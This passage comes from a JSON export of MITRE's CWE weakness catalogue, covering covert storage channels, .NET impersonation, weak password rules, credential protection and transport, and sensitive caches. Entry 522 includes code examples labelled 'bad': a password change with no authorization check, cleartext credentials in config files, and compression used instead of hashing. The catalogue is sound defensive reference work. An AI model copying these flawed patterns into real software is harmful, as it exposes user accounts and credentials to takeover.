Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"515":{"attr":{"@_ID":"515","@_Name":"Covert Storage Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A covert storage channel transfers information through the setting of bits by one program and the reading of those bits by another. What distinguishes this case from that of ordinary operation is that the bits are used to convey encoded information.","Extended_Description":"Covert storage channels occur when out-of-band data is stored in messages for the purpose of memory reuse. Covert channels are frequently classified as either storage or timing channels. Examples would include using a file intended to hold only audit information to convey user passwords--using the name of a file or perhaps status bits associated with it that can be read by all users to signal the contents of the file. Steganography, concealing information in such a manner that no one but the intended recipient knows of the existence of the message, is a good example of a covert storage channel.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"514","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Covert storage channels may provide attackers with important information about the system in question."},{"Scope":["Integrity","Confidentiality"],"Impact":"Read Application Data","Note":"If these messages or packets are sent with unnecessary data contained within, it may tip off malicious listeners as to the process that created the message. With this information, attackers may learn any number of things, including the hardware platform, operating system, or algorithms used by the sender. This information can be of significant value to the user in launching further attacks."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that all reserved fields are set to zero before messages are sent and that no unnecessary information is included."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An excellent example of covert storage channels in a well known application is the ICMP error message echoing functionality. Due to ambiguities in the ICMP RFC, many IP implementations use the memory within the packet for storage or calculation. For this reason, certain fields of certain packets -- such as ICMP error packets which echo back parts of received messages -- may contain flaws or extra information which betrays information about the identity of the target operating system. This information is then used to build up evidence to decide the environment of the target. This is the first crucial step in determining if a given system is vulnerable to a particular flaw and what changes must be made to malicious code to mount a successful attack."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Storage"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Covert storage channel"}]},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"516":{"attr":{"@_ID":"516","@_Name":"DEPRECATED: Covert Timing Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness can be found at CWE-385.","Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":{"#text":"DEPRECATED (Duplicate): Covert Timing Channel","attr":{"@_Date":"2021-07-20"}}}},"520":{"attr":{"@_ID":"520","@_Name":".NET Misconfiguration: Use of Impersonation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Allowing a .NET application to run at potentially escalated levels of access to the underlying operating and file systems can be dangerous and result in various forms of attacks.","Extended_Description":".NET server applications can optionally execute using the identity of the user authenticated to the client. The intention of this functionality is to bypass authentication and access control checks within the .NET application code. Authentication is done by the underlying web server (Microsoft Internet Information Service IIS), which passes the authenticated token, or unauthenticated anonymous token, to the .NET application. Using the token to impersonate the client, the application then relies on the settings within the NTFS directories and files to control access. Impersonation enables the application, on the server running the .NET application, to both execute code and access resources in the context of the authenticated and authorized user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Operation","Description":"Run the application with limited privilege to the underlying operating and file system."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":".NET Misconfiguration: Impersonation","attr":{"@_Date":"2008-04-11"}}}},"521":{"attr":{"@_ID":"521","@_Name":"Weak Password Requirements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not require that users should have strong passwords, which makes it easier for attackers to compromise user accounts.","Extended_Description":"Authentication mechanisms often rely on a memorized secret (also known as a password) to provide an assertion of identity for a user of a system. It is therefore important that this password be of sufficient complexity and impractical for an adversary to guess. The specific requirements around how complex a password needs to be depends on the type of system being protected. Selecting the correct password requirements and enforcing them through implementation are critical to the overall success of the authentication mechanism.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation","Note":"Not enforcing the password policy stated in a products design can allow users to create passwords that do not provide the necessary level of protection."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could easily guess user passwords and gain access user accounts."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["A product\'s design should require adherance to an appropriate password policy. Specific password requirements depend strongly on contextual factors, but it is recommended to contain the following attributes:","See NIST 800-63B https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf Sections: 5.1.1, 10.2.1, and Appendix A for further information on password requirements."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":[{"xhtml:li":["Enforcement of a minimum and maximum length","Restrictions against password reuse","Restrictions against using common passwords","Restrictions against using contextual string in the password (e.g., user id, app name)"]},{"xhtml:li":[{"#text":"Complex passwords requiring mixed character sets (alpha, numeric, special, mixed case)","xhtml:ul":{"xhtml:li":["Increasing the range of characters makes the password harder to crack and may be appropriate for systems relying on single factor authentication.","Unfortunately, a complex password may be difficult to memorize, encouraging a user to select a short password or to incorrectly manage the password (write it down).","Another disadvantage of this approach is that it often does not result in a significant increases in overal password complexity due to people\'s predictable usage of various symbols."]}},{"#text":"Large Minimum Length (encouraging passphrases instead of passwords)","xhtml:ol":{"xhtml:li":["Increasing the number of characters makes the password harder to crack and may be appropriate for systems relying on single factor authentication.","A disadvantage of this approach is that selecting a good passphrase is not easy and poor passwords can still be generated. Some prompting may be needed to encourage long un-predictable passwords."]}},{"#text":"Randomly Chosen Secrets","xhtml:ol":{"xhtml:li":["Generating a password for the user can help make sure that length and complexity requirements are met, and can result in secure passwords being used.","A disadvantage of this approach is that the resulting password or passpharse may be too difficult to memorize, encouraging them to be written down."]}},{"#text":"Password Expiration","xhtml:ol":{"xhtml:li":["Requiring a periodic password change can reduce the time window that an adversary has to crack a password, while also limiting the damage caused by password exposures at other locations.","Password expiration may be a good mitigating technique when long complex passwords are not desired."]}}]}],"xhtml:p":"Depending on the threat model, the password policy may include several additional attributes."}}},{"Phase":"Architecture and Design","Description":"Consider a second\\n                 authentication factor beyond the password, which prevents the\\n                 password from being a single point of failure. See CWE-308 for\\n                 further information."},{"Phase":"Implementation","Description":"Consider implementing a password complexity meter to inform users when a chosen password meets the required attributes."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"112"}},{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}},{"attr":{"@_External_Reference_ID":"REF-1053","@_Section":"Sections: 5.1.1, 10.2.1, and Appendix A"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"522":{"attr":{"@_ID":"522","@_Name":"Insufficiently Protected Credentials","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain access to user accounts and access sensitive data used by the user accounts."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use an appropriate security mechanism to protect the credentials."},{"Phase":"Architecture and Design","Description":"Make appropriate use of cryptography to protect the credentials."},{"Phase":"Implementation","Description":"Use industry standards to protect the credentials (e.g. LDAP, keystore, etc.)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-56"},"Intro_Text":"This code changes a user\'s password.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$user = $_GET[\'user\'];$pass = $_GET[\'pass\'];$checkpass = $_GET[\'checkpass\'];if ($pass == $checkpass) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"SetUserPassword($user, $pass);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user\'s password and gain control of the victim\'s account."},{"attr":{"@_Demonstrative_Example_ID":"DX-57"},"Intro_Text":"The following code reads a password from a properties file and uses the password to connect to a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...Properties prop = new Properties();prop.load(new FileInputStream(\\"config.properties\\"));String password = prop.getProperty(\\"password\\");DriverManager.getConnection(url, usr, password);...","xhtml:br":["","","","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-58"},"Intro_Text":"The following code reads a password from the registry and uses the password to create a new network credential.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String password = regKey.GetValue(passKey).toString();NetworkCredential netCred = new NetworkCredential(username,password,domain);...","xhtml:br":["","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system"},{"attr":{"@_Demonstrative_Example_ID":"DX-59"},"Intro_Text":"Both of these examples verify a password by comparing it to a stored compressed version.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"#text":"if (strcmp(compress(password), compressed_password)) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (passwd.Equals(compress(password), compressed_password)) {}return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""],"xhtml:i":"//Diagnostic Mode"}}}],"Body_Text":"Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0681","Description":"Web app allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0681"},{"Reference":"CVE-2000-0944","Description":"Web application password change utility doesn\'t check the original password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0944"},{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A7","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"102"}},{"attr":{"@_CAPEC_ID":"474"}},{"attr":{"@_CAPEC_ID":"50"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"551"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"645"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"523":{"attr":{"@_ID":"523","@_Name":"Unprotected Transport of Credentials","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Login pages do not use adequate measures to protect the user name and password while they are in transit from the client to the server.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"312","@_View_ID":"1000"}}]},"Background_Details":{"Background_Detail":"SSL (Secure Socket Layer) provides data confidentiality and integrity to HTTP. By encrypting HTTP messages, SSL protects from attackers eavesdropping or altering message contents."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Operation","System Configuration"],"Description":"Enforce SSL use for the login page or any page used to transmit user credentials or other sensitive information. Even if the entire site does not use SSL, it MUST use SSL for login. Additionally, to help prevent phishing attacks, make sure that SSL serves the login page. SSL allows the user to verify the identity of the server to which they are connecting. If the SSL serves login page, the user can be certain they are talking to the proper end system. A phishing attack would typically redirect a user to a site that does not have a valid trusted server certificate issued from an authorized supplier."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"102"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships, Type"}]}},"524":{"attr":{"@_ID":"524","@_Name":"Use of Cache Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses a cache that contains sensitive information, but the cache can be read by an actor outside of the intended control sphere.","Extended_Description":"Applications may use caches to improve efficiency when communicating with remote entities or performing intensive calculations.  A cache maintains a pool of objects, threads, connections, pages, financial data, passwords, or other resources to minimize the time it takes to initialize and access these resources.  If the cache is accessible to unauthorized actors, attackers can read the cache and obtain this sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect information stored in cache."},{"Phase":"Architecture and Design","Description":"Do not store unnecessarily sensitive information in the cache."},{"Phase":"Architecture and Design","Description":"Consider using encryption in the cache."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"204"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content 